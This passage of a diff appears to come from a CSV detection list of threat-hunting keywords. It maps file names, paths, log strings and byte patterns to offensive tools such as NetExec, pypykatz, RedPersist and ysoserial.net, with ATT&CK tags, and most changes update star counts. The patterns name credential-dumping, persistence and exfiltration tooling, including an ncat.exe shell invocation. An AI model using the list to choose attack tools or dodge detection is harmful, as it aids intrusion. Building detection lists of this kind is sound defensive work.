extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*\whatlicense-main\*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*\WheresMyImplant*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*\while_dll_ms*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*\Windows\Tasks\Certipy*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","566","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*\whoami.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\Windows\Tasks\Certipy*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" "*\Windows\Tasks\p4yl0ad*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*\Windows\Temp\creds.db*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" -"*\windows\temp\ncat.exe -nv *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"*\windows\temp\pwned.trx*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*\Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*\WindowsShareFinder.cs*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" -"*\Win-PS2EXE*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*\windows\temp\ncat.exe -nv *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*\windows\temp\pwned.trx*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*\Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*\WindowsShareFinder.cs*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*\Win-PS2EXE*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*\winscp_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\WiperPoc.cpp*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*\wireless.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\wl_log.txt*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*\wl-lic.exe*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*\wl-lic.pdb*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*\wmi_1.dll*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*\wmi_2.dll*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" -"*\WritebleRegistryKeys.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*\ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*\ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*\WSPCoerce.cs*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","202","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"*\WritebleRegistryKeys.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*\ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*\WSPCoerce.cs*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*\x44\x8b\x01\x44\x39\x42*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*\x64\Release\indirect.exe *","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" "*\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*\x8b\x31\x39\x72\x10\x75*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*\XOR_b64_encrypted\*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*\xorencrypt.py*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" -"*\ysoserial\*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"*] Eventviewer Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*] Extension Hijacking Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*] Found non-ASCII service: *","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*] Powershell Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*] Screensaver Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*] Startup Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*] UserInitMprLogonScript Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*\ysoserial\*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*\zerologon.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*] Eventviewer Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] Extension Hijacking Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] Found non-ASCII service: *","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*] Powershell Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] Screensaver Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] Startup Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] UserInitMprLogonScript Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" "*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" @@ -6539,71 +6682,71 @@ "*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*_adAclOutput*.xlsx*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*_backdoor.exe*","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" -"*_backdoor.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*_BloodHound.zip*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*_backdoor.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*_BloodHound.zip*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" "*_cobaltstrike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*_dcsync.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*_dns_hijack/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*_dns_hijack/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*_dns_hijack/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - 